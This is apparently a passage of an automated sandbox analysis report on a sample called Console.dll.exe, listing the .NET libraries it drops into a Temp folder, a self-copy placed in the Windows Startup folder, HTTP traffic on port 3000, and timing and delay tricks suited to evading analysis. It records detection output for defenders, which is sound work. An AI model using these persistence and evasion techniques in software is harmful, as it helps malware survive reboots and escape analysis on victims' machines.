            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Process.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Common.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.ProtectedData.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.Writer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.ILGeneration.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Console.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.MemoryMappedFiles.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.SecureString.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLite.Interop.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Registry.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ObjectModel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.Reader.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.CSharp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.UnmanagedMemoryStream.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.FileSystem.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Buffers.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.DriveInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.TypeExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Overlapped.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.Vectors.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\sni.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TraceSource.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.JavaScript.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Permissions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WebSocket4Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Memory.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Thread.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.SystemEvents.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Tar.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.DataSetExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Claims.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Cng.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.ThreadPool.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.NonGeneric.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NameResolution.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Debug.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Calendars.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlSerializer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Algorithms.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Contracts.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.DataAnnotations.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLitePCLRaw.core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Metadata.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Annotations.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tracing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Serialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SqlClient.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebHeaderCollection.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.IsolatedStorage.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.ConfigurationManager.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.Common.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.Brotli.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.FileVersionInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Expressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Security.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Watcher.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.StackTrace.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.ReaderWriter.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Data.Sqlite.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\websocket-sharp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceProcess.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Sockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.CoreLib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Requests.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Timer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NetworkInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.ServicePoint.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Specialized.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Immutable.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Uri.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.RegularExpressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.EF6.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.CodeDom.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.DataContractSerialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebProxy.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.Client.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\mscorlib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Asn1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.DiagnosticSource.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encodings.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Channels.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.Local.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SuperSocket.ClientEngine.dllJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the startup folder
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe\:Zone.Identifier:$DATAJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 3000
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 3000
            Source: C:\Users\user\Desktop\Console.dll.exeMemory allocated: 3BC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeMemory allocated: 5CC0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeMemory allocated: 5AE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeMemory allocated: 5400000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeMemory allocated: 5130000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_01229A40 rdtsc 0_2_01229A40
            Source: C:\Users\user\Desktop\Console.dll.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeWindow / User API: threadDelayed 389Jump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Newtonsoft.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.X509Certificates.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Intrinsics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WindowsBase.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Csp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.CodePages.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Formatters.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Xml.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Web.HttpUtility.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Console.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.ZipFile.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Dataflow.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Ping.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.AppContext.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Quic.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.DispatchProxy.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ValueTuple.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebClient.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.OpenSsl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.ResourceManager.dllJump to dropped file
